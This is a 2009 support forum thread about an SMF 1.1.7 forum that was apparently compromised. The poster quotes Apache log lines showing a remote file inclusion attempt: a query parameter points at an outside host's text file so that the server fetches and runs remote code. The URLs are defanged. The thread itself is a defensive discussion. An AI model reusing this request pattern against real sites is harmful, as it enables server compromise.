News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

My forums was hacked

Started by mark_vstep, January 26, 2009, 07:20:11 AM

Previous topic - Next topic

mark_vstep

Our forum running SMF 1.1.7 has just been hacked (or attempted to)

The log file shows:
www.forumurl.com 202.157.175.4 - - [26/Jan/2009:11:00:11 +0100] "GET /FOLDER_TO_SMF/index.php/?jssShopFileSystem=hxxp:www.aerothaiunion.com/si [nonactive]
k.txt? HTTP/1.1" 200 14877 "-" "libwww-perl/5.801"
www.forumurl.com 202.157.175.4 - - [26/Jan/2009:11:00:13 +0100] "GET /?jssShopFileSystem=hxxp:www.aerothaiunion.com/sik.txt [nonactive]? HTTP/1.1" 302 5 "-" "libwww-perl/5.801"
www.forumurl.com 202.157.175.4 - - [26/Jan/2009:11:00:19 +0100] "GET /FOLDER_TO_SMF/?jssShopFileSystem=hxxp:www.aerothaiunion.com/sik.txt [nonactive]?
HTTP/1.1" 200 14877 "-" "libwww-perl/5.801"

Apparantly they have tried to hack into the webserver via the forum engine and tried to install a virus/trojan.
Does anyone have an idea how we can solve this?

Rumbaar

They either successfully did or attempted, which one was it?

If it was 'just' an attempt you'll find that script target sites everyday.  Most are just random and automated so as long as you are fully up to date and secure you shouldn't have much to worry about.

You can't do anything about anyone attempting, just making sure you are fully secure.  Software and host.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

mark_vstep

Unfortunately they have been successful.
The webserver was overloaded and went offline approx. 3 minutes after this hack.

We have immediately changed all passwords, restored the server to a previous state and brought it back online.

I can understand that the attempt was probably 'accidental'.

According to hxxp:www.security-database.com/cvss.php?alert=CVE-2007-0232 [nonactive] the hack attempt should only affect systems with the "Jshop Server 1.3" installed, however other than SMF 1.1.7 there are no websites running on that particular webserver.
I think that is worth some investigating, that is why I posted it here and submitted the unaltered apache log here

Rumbaar

Well a hack of SMF wouldn't overload a server.  Are you sure the server itself wasn't the target of some other DOS attack?  Also were they able to gain access to SMF systems after this attack?  Was SMF affected in any way?

But yes that attack appears to target a specific installed application, so if it's not present will not be successful.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

gravyface

Go to hxxp:www.milw0rm.com [nonactive] and search for "simple".  You'll find tons of 0-day exploits for this forum: core and add-ons.

Rumbaar

I don't think 'tons' of exploits are currently around for the latest version of SMF, so that's an overstatement.  As for add-ons, we can only do our best to inform the community on those.  We have no control over third party codings.

But ultimately the target of the log isn't a known SMF exploit.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

Advertisement: